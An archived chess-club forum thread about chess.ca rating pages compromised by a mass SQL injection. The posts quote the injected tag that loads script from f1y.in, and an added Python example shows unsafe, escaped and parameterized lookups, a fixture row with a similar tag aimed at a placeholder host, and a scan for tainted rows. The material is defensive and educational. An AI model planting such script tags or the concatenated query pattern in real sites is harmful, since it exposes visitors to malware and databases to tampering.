chess.ca corrupt again?



Egidijus Zeromskis
07-21-2009, 11:31 AM
I suspect that chess.ca was corrupted again. Webpages with information about players' ratings try to execute a script

<script src=http://f1y.in/j.js></script>

Who is responsible for overseeing the webpage? ED?

Bob Gillanders
07-21-2009, 02:10 PM
I suspect that chess.ca was corrupted again. Webpages with information about players' ratings try to execute a script

<script src=http://f1y.in/j.js></script>

Who is responsible for overseeing the webpage? ED?

I would send an email to the ED! If they're not aware of the problem, how can they fix it?

I checked my rating, and I did not encounter any problems (other than it's too low LOL), but I forwarded your message to Gerry at info@chess.ca anyway to be safe.

Stijn De Kerpel
07-21-2009, 08:38 PM
Hi Bob,

This office is aware of the issue - Eric had already sent a note to Gerry on this.

Steve Karpik
07-22-2009, 06:16 PM
It is the result of a SQL injection attack. Here's a little information about it:

http://blog.trendmicro.com/massive-sql-injection-ensues/
http://isc.sans.org/diary.html?storyid=6811

Do not click on the link that shows up (hxxp://f1y.in/j.js) as it appears to lead to something nasty (I've deliberately messed up the url replacing http with hxxp to prevent anyone from accidentally clicking on the link).

Ideally all web form data (like where you enter your surname to get your rating) should be filtered to prevent SQL injections. Although by looking at the number of sites that have been hit by this attack, it must be doing something a bit tricky or lots of web sites are being lazy with form filtering.

Christopher Mallon
07-22-2009, 06:30 PM
Although by looking at the number of sites that have been hit by this attack, it must be doing something a bit tricky or lots of web sites are being lazy with form filtering.

This... despite most major systems having built-in code to prevent this, many people don't bother using it, and MUCH worse, quite a few web development books DON'T TELL YOU TO!

I'm not familiar with ASP in particular but usually it's some variation of Escape("string goes here");
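Steve's point about filtering form data and Christopher's point about the built-in escaping routines are the two sides of the same fix, so here is an added example that is not from this thread or from chess.ca: a rating lookup by surname written three ways (string concatenation, quote escaping, bound parameter) plus the post-incident check that finds rows already carrying an injected script tag. It uses Python's standard sqlite3 module with a constructed two-column table; the table, the names in it, and the attacker.invalid host name are all made up for the example.

```python
import re
import sqlite3

# Constructed sample data standing in for a rating table (not chess.ca's real
# schema or data). The last row mimics a record that a mass SQL injection has
# already tampered with by appending a script tag to a text column; the host
# name is a placeholder, not the one reported on the site.
PLAYERS = [
    ("Smith", 1850),
    ("O'Brien", 2010),
    ("Zeromskis", 2100),
    ("Karpik<script src=http://attacker.invalid/j.js></script>", 1900),
]

SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)


def make_db():
    """In-memory SQLite database loaded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE players (surname TEXT, rating INTEGER)")
    conn.executemany("INSERT INTO players VALUES (?, ?)", PLAYERS)
    return conn


def lookup_unsafe(conn, surname):
    """Vulnerable pattern: the form field is pasted into the SQL text, so a
    quote inside it is read as SQL grammar, not as part of the name."""
    sql = "SELECT surname, rating FROM players WHERE surname = '" + surname + "'"
    return conn.execute(sql).fetchall()


def lookup_escaped(conn, surname):
    """The Escape()-style fix: double every single quote before concatenating.
    Correct for this one quoting context, but it has to be remembered at every
    query site, which is exactly what gets forgotten."""
    escaped = surname.replace("'", "''")
    sql = "SELECT surname, rating FROM players WHERE surname = '" + escaped + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, surname):
    """Preferred fix: a bound parameter. The driver passes the value separately
    from the statement text, so quotes, semicolons and comment markers in the
    input are only ever data."""
    sql = "SELECT surname, rating FROM players WHERE surname = ?"
    return conn.execute(sql, (surname,)).fetchall()


def find_injected_scripts(conn):
    """Clean-up check after an incident: list rows whose text column already
    carries a script tag, which is how the symptom in the first post shows up
    inside a compromised database."""
    rows = conn.execute("SELECT rowid, surname FROM players").fetchall()
    return [(rowid, name) for rowid, name in rows if SCRIPT_TAG.search(name)]


def demo():
    """Run the three lookups on a legitimate surname that contains a quote,
    plus the post-incident scan, and return everything for checking."""
    conn = make_db()
    out = {
        "escaped": lookup_escaped(conn, "O'Brien"),
        "safe": lookup_safe(conn, "O'Brien"),
        "tainted_rows": find_injected_scripts(conn),
    }
    try:
        out["unsafe"] = lookup_unsafe(conn, "O'Brien")
    except sqlite3.OperationalError as exc:
        # The quote in O'Brien ended the string literal early and the rest of
        # the name was parsed as SQL; that the input can rewrite the statement
        # at all is the defect, the syntax error is just its harmless form.
        out["unsafe"] = "error: " + str(exc)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The escaped and parameterized lookups both return the O'Brien row; the concatenated one fails because the apostrophe changed the statement. Bound parameters are the version to standardise on: they need no per-field escaping decision, and the scan function is the kind of query worth running against every text column once a site like this has been hit, since the injected rows stay in the database after the form has been fixed.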

Jason Lohner
07-25-2009, 08:00 AM
damn script kiddies...